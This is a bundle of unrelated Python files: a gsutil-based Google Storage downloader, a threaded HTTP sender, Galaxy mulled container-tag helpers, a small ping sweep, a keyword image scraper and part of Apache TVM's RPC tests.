Under cygwin, this will always return "win32" like the native Python."""
if sys.platform == 'cygwin':
return 'win32'
return sys.platform
# Common utilities
class Gsutil(object):
"""Call gsutil with some predefined settings. This is a convenience object,
and is also immutable."""
def __init__(self, path, boto_path, timeout=None, version='4.7'):
if not os.path.exists(path):
raise FileNotFoundError('GSUtil not found in %s' % path)
self.path = path
self.timeout = timeout
self.boto_path = boto_path
self.version = version
def get_sub_env(self):
env = os.environ.copy()
if self.boto_path == os.devnull:
env['AWS_CREDENTIAL_FILE'] = ''
env['BOTO_CONFIG'] = ''
elif self.boto_path:
env['AWS_CREDENTIAL_FILE'] = self.boto_path
env['BOTO_CONFIG'] = self.boto_path
else:
custompath = env.get('AWS_CREDENTIAL_FILE', '~/.boto') + '.depot_tools'
custompath = os.path.expanduser(custompath)
if os.path.exists(custompath):
env['AWS_CREDENTIAL_FILE'] = custompath
return env
def call(self, *args):
cmd = [sys.executable, self.path, '--force-version', self.version]
cmd.extend(args)
return subprocess2.call(cmd, env=self.get_sub_env(), timeout=self.timeout)
def check_call(self, *args):
cmd = [sys.executable, self.path, '--force-version', self.version]
cmd.extend(args)
((out, err), code) = subprocess2.communicate(
cmd,
stdout=subprocess2.PIPE,
stderr=subprocess2.PIPE,
env=self.get_sub_env(),
timeout=self.timeout)
# Parse output.
status_code_match = re.search('status=([0-9]+)', err)
if status_code_match:
return (int(status_code_match.group(1)), out, err)
if ('You are attempting to access protected data with '
'no configured credentials.' in err):
return (403, out, err)
if 'No such object' in err:
return (404, out, err)
return (code, out, err)
def check_platform(target):
"""Checks if any parent directory of target matches (win|mac|linux)."""
assert os.path.isabs(target)
root, target_name = os.path.split(target)
if not target_name:
return None
if target_name in ('linux', 'mac', 'win'):
return target_name
return check_platform(root)
def get_sha1(filename):
sha1 = hashlib.sha1()
with open(filename, 'rb') as f:
while True:
# Read in 1mb chunks, so it doesn't all have to be loaded into memory.
chunk = f.read(1024*1024)
if not chunk:
break
sha1.update(chunk)
return sha1.hexdigest()
# Download-specific code starts here
def enumerate_work_queue(input_filename, work_queue, directory,
recursive, ignore_errors, output, sha1_file,
auto_platform):
if sha1_file:
if not os.path.exists(input_filename):
if not ignore_errors:
raise FileNotFoundError('%s not found.' % input_filename)
print >> sys.stderr, '%s not found.' % input_filename
with open(input_filename, 'rb') as f:
sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip())
if sha1_match:
        work_queue.put((sha1_match.group(1), output))
return 1
if not ignore_errors:
raise InvalidFileError('No sha1 sum found in %s.' % input_filename)
print >> sys.stderr, 'No sha1 sum found in %s.' % input_filename
return 0
if not directory:
work_queue.put((input_filename, output))
return 1
work_queue_size = 0
for root, dirs, files in os.walk(input_filename):
if not recursive:
for item in dirs[:]:
dirs.remove(item)
else:
for exclude in ['.svn', '.git']:
if exclude in dirs:
dirs.remove(exclude)
for filename in files:
full_path = os.path.join(root, filename)
if full_path.endswith('.sha1'):
if auto_platform:
# Skip if the platform does not match.
target_platform = check_platform(os.path.abspath(full_path))
if not target_platform:
err = ('--auto_platform passed in but no platform name found in '
'the path of %s' % full_path)
if not ignore_errors:
raise InvalidFileError(err)
print >> sys.stderr, err
continue
current_platform = PLATFORM_MAPPING[sys.platform]
if current_platform != target_platform:
continue
with open(full_path, 'rb') as f:
sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip())
if sha1_match:
          work_queue.put(
              (sha1_match.group(1), full_path.replace('.sha1', '')))
work_queue_size += 1
else:
if not ignore_errors:
raise InvalidFileError('No sha1 sum found in %s.' % filename)
print >> sys.stderr, 'No sha1 sum found in %s.' % filename
return work_queue_size
def _downloader_worker_thread(thread_num, q, force, base_url,
gsutil, out_q, ret_codes, verbose):
while True:
input_sha1_sum, output_filename = q.get()
if input_sha1_sum is None:
return
if os.path.exists(output_filename) and not force:
if get_sha1(output_filename) == input_sha1_sum:
if verbose:
out_q.put(
'%d> File %s exists and SHA1 matches. Skipping.' % (
thread_num, output_filename))
continue
# Check if file exists.
file_url = '%s/%s' % (base_url, input_sha1_sum)
if gsutil.check_call('ls', file_url)[0] != 0:
out_q.put('%d> File %s for %s does not exist, skipping.' % (
thread_num, file_url, output_filename))
ret_codes.put((1, 'File %s for %s does not exist.' % (
file_url, output_filename)))
continue
# Fetch the file.
out_q.put('%d> Downloading %s...' % (thread_num, output_filename))
try:
os.remove(output_filename) # Delete the file if it exists already.
except OSError:
if os.path.exists(output_filename):
out_q.put('%d> Warning: deleting %s failed.' % (
thread_num, output_filename))
code, _, err = gsutil.check_call('cp', file_url, output_filename)
if code != 0:
out_q.put('%d> %s' % (thread_num, err))
ret_codes.put((code, err))
# Set executable bit.
if sys.platform == 'cygwin':
# Under cygwin, mark all files as executable. The executable flag in
# Google Storage will not be set when uploading from Windows, so if
# this script is running under cygwin and we're downloading an
# executable, it will be unrunnable from inside cygwin without this.
st = os.stat(output_filename)
os.chmod(output_filename, st.st_mode | stat.S_IEXEC)
elif sys.platform != 'win32':
# On non-Windows platforms, key off of the custom header
# "x-goog-meta-executable".
      code, out, err = gsutil.check_call('stat', file_url)
if code != 0:
out_q.put('%d> %s' % (thread_num, err))
ret_codes.put((code, err))
elif re.search(r'executable:\s*1', out):
st = os.stat(output_filename)
os.chmod(output_filename, st.st_mode | stat.S_IEXEC)
def printer_worker(output_queue):
while True:
line = output_queue.get()
    # It's plausible we want to print empty lines.
if line is None:
break
print line
def download_from_google_storage(
input_filename, base_url, gsutil, num_threads, directory, recursive,
force, output, ignore_errors, sha1_file, verbose, auto_platform):
# Start up all the worker threads.
all_threads = []
download_start = time.time()
stdout_queue = Queue.Queue()
work_queue = Queue.Queue()
ret_codes = Queue.Queue()
ret_codes.put((0, None))
for thread_num in range(num_threads):
t = threading.Thread(
target=_downloader_worker_thread,
args=[thread_num, work_queue, force, base_url,
gsutil, stdout_queue, ret_codes, verbose])
t.daemon = True
t.start()
all_threads.append(t)
printer_thread = threading.Thread(target=printer_worker, args=[stdout_queue])
printer_thread.daemon = True
printer_thread.start()
# Enumerate our work queue.
work_queue_size = enumerate_work_queue(
input_filename, work_queue, directory, recursive,
ignore_errors, output, sha1_file, auto_platform)
for _ in all_threads:
work_queue.put((None, None)) # Used to tell worker threads to stop.
# Wait for all downloads to finish.
for t in all_threads:
t.join()
stdout_queue.put(None)
printer_thread.join()
# See if we ran into any errors.
max_ret_code = 0
for ret_code, message in ret_codes.queue:
max_ret_code = max(ret_code, max_ret_code)
if message:
print >> sys.stderr, message
if verbose and not max_ret_code:
print 'Success!'
if verbose:
    print 'Downloading %d files took %.1f second(s)' % (
work_queue_size, time.time() - download_start)
return max_ret_code
def main(args):
usage = ('usage: %prog [options] target\n'
'Target must be:\n'
' (default) a sha1 sum ([A-Za-z0-9]{40}).\n'
' (-s or --sha1_file) a .sha1 file, containing a sha1 sum on '
'the first line.\n'
' (-d or --directory) A directory to scan for .sha1 files.')
parser = optparse.OptionParser(usage)
parser.add_option('-o', '--output',
help='Specify the output file name. Defaults to: '
'(a) Given a SHA1 hash, the name is the SHA1 hash. '
'(b) Given a .sha1 file or directory, the name will '
'match (.*).sha1.')
parser.add_option('-b', '--bucket',
help='Google Storage bucket to fetch from.')
parser.add_option('-e', '--boto',
help='Specify a custom boto file.')
  parser.add_option('-c', '--no_resume', action='store_true',
                    help='Do not resume a partially downloaded file; skip '
                         'the existing-output check and download it again.')
parser.add_option('-f', '--force', action='store_true',
help='Force download even if local file exists.')
parser.add_option('-i', '--ignore_errors', action='store_true',
help='Don\'t throw error if we find an invalid .sha1 file.')
parser.add_option('-r', '--recursive', action='store_true',
help='Scan folders recursively for .sha1 files. '
'Must be used with -d/--directory')
parser.add_option('-t', '--num_threads', default=1, type='int',
help='Number of downloader threads to run.')
parser.add_option('-d', '--directory', action='store_true',
help='The target is a directory. '
'Cannot be used with -s/--sha1_file.')
parser.add_option('-s', '--sha1_file', action='store_true',
help='The target is a file containing a sha1 sum. '
'Cannot be used with -d/--directory.')
parser.add_option('-g', '--config', action='store_true',
help='Alias for "gsutil config". Run this if you want '
'to initialize your saved Google Storage '
'credentials. This will create a read-only '
'credentials file in ~/.boto.depot_tools.')
parser.add_option('-n', '--no_auth', action='store_true',
help='Skip auth checking. Use if it\'s known that the '
'target bucket is a public bucket.')
parser.add_option('-p', '--platform',
help='A regular expression that is compared against '
'Python\'s sys.platform. If this option is specified, '
'the download will happen only if there is a match.')
parser.add_option('-a', '--auto_platform',
action='store_true',
                    help='Detects if any parent folder of the target matches '
                         '(linux|mac|win). If so, the script will only '
                         'process files in paths that match the current '
                         'platform.')
parser.add_option('-v', '--verbose', action='store_true',
help='Output extra diagnostic and progress information.')
(options, args) = parser.parse_args()
# Make sure we should run at all based on platform matching.
if options.platform:
if options.auto_platform:
parser.error('--platform can not be specified with --auto_platform')
if not re.match(options.platform, GetNormalizedPlatform()):
if options.verbose:
print('The current platform doesn\'t match "%s", skipping.' %
options.platform)
return 0
# Set the boto file to /dev/null if we don't need auth.
if options.no_auth:
if (set(('http_proxy', 'https_proxy')).intersection(
env.lower() for env in os.environ) and
'NO_AUTH_BOTO_CONFIG' not in os.environ):
print >> sys.stderr, ('NOTICE: You have PROXY values set in your '
'environment, but gsutil in depot_tools does not '
'(yet) obey them.')
print >> sys.stderr, ('Also, --no_auth prevents the normal BOTO_CONFIG '
'environment variable from being used.')
print >> sys.stderr, ('To use a proxy in this situation, please supply '
'those settings in a .boto file pointed to by '
'the NO_AUTH_BOTO_CONFIG environment var.')
options.boto = os.environ.get('NO_AUTH_BOTO_CONFIG', os.devnull)
# Make sure gsutil exists where we expect it to.
if os.path.exists(GSUTIL_DEFAULT_PATH):
gsutil = Gsutil(GSUTIL_DEFAULT_PATH,
boto_path=options.boto)
else:
parser.error('gsutil not found in %s, bad depot_tools checkout?' %
GSUTIL_DEFAULT_PATH)
# Passing in -g/--config will run our copy of GSUtil, then quit.
if options.config:
return gsutil.call('config', '-r', '-o',
os.path.expanduser('~/.boto.depot_tools'))
if not args:
parser.error('Missing target.')
if len(args) > 1:
parser.error('Too many targets.')
if not options.bucket:
parser.error('Missing bucket. Specify bucket with --bucket.')
if options.sha1_file and options.directory:
parser.error('Both --directory and --sha1_file are specified, '
'can only specify one.')
if options.recursive and not options.directory:
parser.error('--recursive specified but --directory not specified.')
if options.output and options.directory:
parser.error('--directory is specified, so --output has no effect.')
if (not (options.sha1_file or options.directory)
and options.auto_platform):
parser.error('--auto_platform must be specified with either '
'--sha1_file or --directory')
input_filename = args[0]
# Set output filename if not specified.
if not options.output and not options.directory:
if not options.sha1_file:
# Target is a sha1 sum, so output filename would also be the sha1 sum.
options.output = input_filename
elif options.sha1_file:
# Target is a .sha1 file.
if not input_filename.endswith('.sha1'):
parser.error('--sha1_file is specified, but the input filename '
'does not end with .sha1, and no --output is specified. '
'Either make sure the input filename has a .sha1 '
'extension, or specify --output.')
options.output = input_filename[:-5]
else:
parser.error('Unreachable state.')
# Check if output file already exists.
if not options.directory and not options.force and not options.no_resume:
if os.path.exists(options.output):
      parser.error('Output file %s exists and --no_resume was not specified.'
                   % options.output)
base_url = 'gs://%s' % options.bucket
return download_from_google_storage(
input_filename, base_url, gsutil, options.num_threads, options.directory,
options.recursive, options.force, options.output, options.ignore_errors,
options.sha1_file, options.verbose, options.auto_platform)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
playerio.py
|
import threading
import urllib3
urllib3.disable_warnings()
http = urllib3.PoolManager()
def last_sender(player):
    # Drain the queue: send the oldest message, pop it, repeat until empty.
    # Iterative version of the original recursive sender, so a long queue
    # cannot exhaust the call stack.
    while True:
        content = player.text_deque[0]  # (method, url, body, headers)
        res = http.request(content[0], content[1], body=content[2], headers=content[3])
        check(res)
        player.text_lock.acquire()
        player.text_deque.popleft()
        queue_empty = len(player.text_deque) == 0
        player.text_lock.release()
        if queue_empty:
            break
# Main function to send message to player
def send_to_queue(player, content):
    # Append under the lock and only start a sender thread when the queue was
    # empty; otherwise the sender that is already running will pick it up.
    player.text_lock.acquire()
    was_empty = len(player.text_deque) == 0
    player.text_deque.append(content)
    player.text_lock.release()
    if was_empty:
        t = threading.Thread(target=last_sender, args=(player,))
        t.start()
    return True
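# Illustrative call (hypothetical values): `content` is a (method, url, body,
# headers) tuple consumed positionally by last_sender, e.g.
#   send_to_queue(player, ('POST', 'https://example.com/msg', payload, headers))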
# check the response status
def check(res):
    if res.status == 200:
        return True
    print(res.status)
    print('res = ' + str(res.data))
    return False
|
waterfallRepo.py
|
from queue import Queue
from threading import Thread
from commands.download.downloadCommandParams import DownloadCommandParams
from commands.download.waterfallDownloadCommand import WaterfallDownloadCommand
from workers.downloadWorker import DownloadWorker
from domain.interfaces.downloadable import Downloadable
class WaterfallRepo(Downloadable):
def __init__(self, working_dir, modules):
self.__working_dir = working_dir
self.__waterfall_commands = Queue()
self.__modules = modules
def register_command(self, observation, start_date, end_date):
cmd_parameters = DownloadCommandParams(
self.__working_dir, self.__create_dir_name('waterfall', start_date, end_date), self.__modules)
waterfallDownloadCommand = WaterfallDownloadCommand(
cmd_parameters, observation)
self.__waterfall_commands.put(waterfallDownloadCommand)
def create_worker(self):
return self.__create_thread(self.__waterfall_commands)
def __create_thread(self, queue):
worker = DownloadWorker(queue)
thread = Thread(target=worker.execute)
thread.daemon = True
thread.start()
return thread
def __create_dir_name(self, target, start_date, end_date):
return target + '__' + start_date.strftime('%m-%d-%YT%H-%M-%S') + '__' + end_date.strftime('%m-%d-%YT%H-%M-%S')
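        # Illustrative result (hypothetical dates): for a start of
        # 2021-01-31 00:00:00 and an end of 2021-01-31 01:00:00 this yields
        # 'waterfall__01-31-2021T00-00-00__01-31-2021T01-00-00'.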
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
import time
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('ParsedTag', 'tag version build_string build_number')
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
    requests.post(QUAY_REPOSITORY_API_ENDPOINT, json=data, headers=headers)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=None)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Get all quay containers in the biocontainers repo
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=None)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
        # The following check is pretty expensive against biocontainers... don't
        # even bother doing it if we can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag
build_string = "-1"
if '--' in tag:
version, build_string = tag.rsplit('--', 1)
elif '-' in tag:
# Should be mulled multi-container image tag
version, build_string = tag.rsplit('-', 1)
    match = BUILD_NUMBER_REGEX.search(tag)
    build_number = int(match.group(0)) if match else -1
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
    elements = sorted(elements, key=lambda tag: tag.version, reverse=True)
return [e.tag for e in elements]
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
if image_build is not None:
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
suffix = image_build
else:
suffix += ":%s" % target.version
build = target.build
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
        # tagged version is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
r = requests.get(url)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = False
def progress(self):
while not self.stop:
print(".", end="")
sys.stdout.flush()
time.sleep(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop = True
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
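# A minimal, hypothetical demo (not part of the original module) of how the
# tag helpers compose; the tag strings below are made up.
if __name__ == "__main__":
    demo_tags = ["1.3.1--0", "1.3.1--2", "1.2.0--1"]
    for parsed in (parse_tag(t) for t in demo_tags):
        print(parsed.tag, parsed.version, parsed.build_number)
    # Newest version first, higher build number breaking ties:
    print(version_sorted(demo_tags))  # ['1.3.1--2', '1.3.1--0', '1.2.0--1']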
|
mtping2.py
|
import threading
import subprocess
class Ping:
def __init__(self, host):
self.host = host
def __call__(self):
        result = subprocess.run(
            # Use POSIX-sh-safe redirection: the bash-only '&>' backgrounds
            # the command under dash and makes every host look up.
            'ping -c2 %s > /dev/null 2>&1' % self.host,
            shell=True
        )
if result.returncode == 0:
print('%s:up' % self.host)
else:
print('%s:down' % self.host)
if __name__ == '__main__':
ips = ('172.40.63.%s' % i for i in range(1, 255))
for ip in ips:
t = threading.Thread(target=Ping(ip))
t.start() # target()
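# A hedged alternative sketch (defined but not called above): the same
# callable-as-target pattern driven by a bounded stdlib worker pool instead
# of one unjoined thread per host.
def ping_with_pool(hosts, max_workers=64):
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # Ping instances are plain callables, so they map directly; iterating
        # the results also surfaces any exceptions raised in workers.
        for _ in pool.map(lambda host: Ping(host)(), hosts):
            pass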
|
snippet.py
|
#!/usr/bin/env python3
from threading import Thread
from urllib.parse import unquote
from pathlib import Path
from queue import Queue
import requests
import os.path
import sys
import re
INDEX_PAGE = 'http://rule34.paheal.net/post/list/%s/%d'
RE_IMG_URL = r'href=\"(.*)\"\>Image Only'
RE_TOTAL_PAGES = r'\/(\d+)\"\>Last\<\/a\>'
RE_BAD_FILENAME = r'[^\w\s\-\.\~\!\@\#\$\%\^\(\)\+\=\']'
DOWNLOAD_THREAD = 10
def fetch_total_pages(kw):
resp = requests.get(INDEX_PAGE % (kw, 1))
match = re.search(RE_TOTAL_PAGES, resp.text)
if match is None:
# No <a>Last</a> tag if only 1 page.
return 1
return int(match.group(1))
def fetch_urls(kw, page_from, page_to):
for i in range(page_from, page_to + 1):
resp = requests.get(INDEX_PAGE % (kw, i))
urls = re.findall(RE_IMG_URL, resp.text)
print('%s images are found in page %s.' % (len(urls), i))
for url in urls:
yield url
def download(queue, path, tid):
    while True:
        url = queue.get()
        if url is None:
            break
        try:
            fname = unquote(url).split('/')[-1]
            fname = re.sub(RE_BAD_FILENAME, ' ', fname).strip()
            save_to = path / fname
            if save_to.exists():
                continue
            print('#%02d Downloading %s...' % (tid, fname))
            resp = requests.get(url)
            with save_to.open('wb') as f:
                f.write(resp.content)
        finally:
            # Mark the item done on every path, including the skip branch.
            queue.task_done()
    print('#%02d exited.' % tid)
def main():
if not 2 <= len(sys.argv) <= 3:
print('Download all images from rule34.paheal.net, ignore existing '
'files.\n')
print('Usage: %s <keyword> [threads-num]' % sys.argv[0])
sys.exit(1)
kw = sys.argv[1]
if len(sys.argv) >= 3:
thread_num = int(sys.argv[2])
else:
thread_num = DOWNLOAD_THREAD
path = Path(kw)
if not path.exists():
path.mkdir()
    elif not path.is_dir():
        print('Cannot write to %s, file exists.' % path)
        sys.exit(1)
print('Fetching the number of pages...')
pages = fetch_total_pages(kw)
print('%s page(s) in total.' % pages)
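    # A bounded queue (20 URLs per worker) applies backpressure: the page
    # fetcher blocks on put() once the workers fall behind.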
queue = Queue(thread_num * 20)
threads = []
for i in range(thread_num):
t = Thread(target=download, args=(queue, path, i))
t.start()
threads.append(t)
print('%s threads are ready.' % len(threads))
for url in fetch_urls(kw, 1, pages):
queue.put(url)
for i in range(len(threads)):
queue.put(None)
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
from tvm import rpc
from tvm.relay.backend import Runtime
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
from tvm.rpc.proxy import Proxy
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
    # Windows does not support fork, so the spawn start method is expected
    # there; keep the tests enabled on Windows.
    not sys.platform.startswith("win") and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
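# A hedged illustration (not from the original test suite) of the top-level
# registration the note above describes; "example.addone" is a hypothetical
# name. Because the call runs at module import time, a "spawn"ed child that
# re-imports this file sees the function, while anything registered inside a
# test body would be missing on the server side.
@tvm.register_func("example.addone", override=True)
def _example_addone(x):
    return x + 1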
# NOTE: When writing tests, wrap remote-related checking in a sub-function
# to ensure all the remote resources are destructed before the server terminates.
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.numpy() + 1, b.numpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
def check_remote():
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
check_remote()
@tvm.testing.requires_rpc
